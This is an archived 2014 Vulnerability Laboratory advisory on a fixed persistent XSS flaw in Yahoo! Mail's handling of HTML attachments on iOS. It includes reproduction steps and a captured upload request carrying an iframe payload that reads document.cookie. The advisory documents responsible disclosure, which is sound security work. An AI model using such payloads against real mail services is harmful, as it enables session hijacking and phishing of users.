[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Yahoo! Bug Bounty #30 YM - Application-Side Mail Encoding (File Attachment) Vulnerability

Document Title:
===============
Yahoo! Bug Bounty #30 YM - Application-Side Mail Encoding (File Attachment) 
Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1137


Release Date:
=============
2014-07-08


Vulnerability Laboratory ID (VL-ID):
====================================
1137


Common Vulnerability Scoring System:
====================================
5.3


Product & Service Introduction:
===============================
Yahoo! Inc. is an American multinational internet corporation headquartered in 
Sunnyvale, California. It is widely 
known for its web portal, search engine Yahoo! Search, and related services, 
including Yahoo! Directory, Yahoo! Mail, 
Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, online 
mapping, video sharing, fantasy sports 
and its social media website. It is one of the most popular sites in the United 
States. According to news sources, 
roughly 700 million people visit Yahoo! websites every month. Yahoo! itself 
claims it attracts `more than half a 
billion consumers every month in more than 30 languages.

(Copy of the Vendor Homepage: http://www.yahoo.com )


Abstract Advisory Information:
==============================
The Vulnerability-Laboratory Research Team has discovered a persistent input 
validation vulnerability in the official Yahoo! Mail Service web-application.


Vulnerability Disclosure Timeline:
==================================
2013-11-08:     Researcher Notification & Coordination (Ateeq ur Rehman Khan - 
Core Research Team)
2013-11-09:     Vendor Notification (Yahoo! Security Team - Bug Bounty Program)
2014-02-18:     Vendor Response/Feedback (Yahoo! Security Team - Bug Bounty 
Program)
2014-06-01:     Vendor Fix/Patch (Yahoo! Developer Team - Reward: HackerOne 
Program)
2014-07-08:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Yahoo!
Product: Yahoo! Mail - Web Application & API 2013 Q3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent script code inject web vulnerability has been discovered in the 
official Yahoo Mail Service web-application & API. 
The vulnerability affects the Yahoo Mail Mobile Application for iPhone, iPad 
and iPod touch. The vulnerability allows attackers 
to upload / attach own malicious .html files and send them to other Yahoo users.

During the testing, it was discovered that using Yahoo mail, it is possible to 
include malicious script code within .html files 
and send them as attachments to other users. It seems that the application is 
not performing proper validation When uploading 
user attached files. Upon viewing these attached files from your iphone/ipad 
device, the malicious script code gets executed 
directly hence leaving the victims vulnerable to persistent client side attacks.

The security risk of the persistent web vulnerability is estimated as medium 
with a cvss (common vulnerability scoring system) 
count of 5.3. Exploitation of this vulnerability requires low user interaction. 
Successful exploitation of this vulnerability 
results in persistent phishing, persistent client side redirects, user session 
hijacking and similar client side attacks.

Request Method(s):
                                [+] POST

Vulnerable Application(s):
                                [+] Yahoo! Mail - Web Application

Vulnerable Module(s): 
                                [+] Compose Mail > File Attachments

Vulnerable Parameter(s):
                                [+] Attach File


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote 
attackers with low privileged yahoo web application 
account and low user interaction. For security demonstration or to reproduce 
the vulnerability follow the provided information 
and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Register an yahoo mail account and login to the account system
2. Open the `compose a New Yahoo email` section
3. Click the `attach file` button in the compose mail section
4. Attach the POC.html file provided along with this advisory
5. Send out the email with the malicious test attachment to another yahoo test 
account 
6. Using your iPad/iPhone device, click on the attachment link of the newly 
received POC email
7. You should now see an iframe with vulnerability labs website proving the 
existence of this vulnerability
8. Successful reproduce of the yahoo mail service vulnerability!


--- PoC Session Logs ---
POST /us.f1624.mail.yahoo.com/ya/upload_with_cred?output=php&cred=Encrypted 
HTTP/1.1
Host: bf1-attach.mail.yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 
Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://us-mg6.mail.yahoo.com/neo/launch?.rand=7sd8nun2neu5c
Content-Length: 561
Content-Type: multipart/form-data; 
boundary=---------------------------234701259230567
Origin: http://us-mg6.mail.yahoo.com
Cookie: Hidden
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------234701259230567
Content-Disposition: form-data; name="filename
POC.html
-----------------------------234701259230567
Content-Disposition: form-data; name="filesize"
120
-----------------------------234701259230567
Content-Disposition: form-data; name="Filedata"; filename="POC.html"
Content-Type: text/html
'%3d'>"><iframe src='http://www.vulnerability-lab.com' 
onmouseover=alert(document.cookie)></iframe>/927
"><h1>Testing POC Ateeq
-----------------------------234701259230567

Response:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://us-mg6.mail.yahoo.com
Cache-Control: private
Connection: Keep-Alive
Content-Length: 322
Content-Type: text/xml
Date: Fri, 08 Nov 2013 19:12:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml";, CP="CAO DSP COR CUR ADM DEV 
TAI PSA PSD IVAi 
IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM 
NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Server: HTTP/1.1 UserFiberFramework/1.0 
Vary: Accept-Encoding
Via: HTTP/1.1 r03.ycpi.ac4.yahoo.net UserFiberFramework/1.0 

<?xml version="1.0" encoding="UTF-8"?><Response>  <attachment>    
<code>uploadAVNoVirus</code>    
<id>e2fd91b75b55018624eef056c5913b0f</id>    <name>POC.html</name>    
<type>text/html</type>    
<size>126</size>  </attachment></Response><!-- web162405.mail.bf1.yahoo.com 
compressed/chunked Fri Nov  8 11:12:53 PST 2013


Reference(s):
https://mail.yahoo.com


Solution - Fix & Patch:
=======================
Proper security controls should be implemented/enforced in the file attachment 
module to validate inputs and to persistent script code executions.


Security Risk:
==============
The security risk of persistent input validation web vulnerability in the yahoo 
mail service application is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan 
(ateeq@xxxxxxxxxxxxxxxxx) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either 
expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-Lab or its suppliers 
are not liable in any case of damage, including direct, indirect, incidental, 
consequential loss of business profits or special damages, even 
if Vulnerability-Lab or its suppliers have been advised of the possibility of 
such damages. Some states do not allow the exclusion or limitation 
of liability for consequential or incidental damages so the foregoing 
limitation may not apply. We do not approve or encourage anybody to break 
any vendor licenses, policies, deface websites, hack into databases or trade 
with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com              
                        - www.evolution-sec.com
Contact:    admin@xxxxxxxxxxxxxxxxxxxxx         - 
research@xxxxxxxxxxxxxxxxxxxxx                        - admin@xxxxxxxxxxxxxxxxx
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com    
                        - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab 
                        - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php            - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All 
other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To 
record, list (feed), modify, use or edit our material contact 
(admin@xxxxxxxxxxxxxxxxxxxxx or research@xxxxxxxxxxxxxxxxxxxxx) to get a 
permission.

                                Copyright © 2014 | Vulnerability Laboratory 
[Evolution Security]


-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx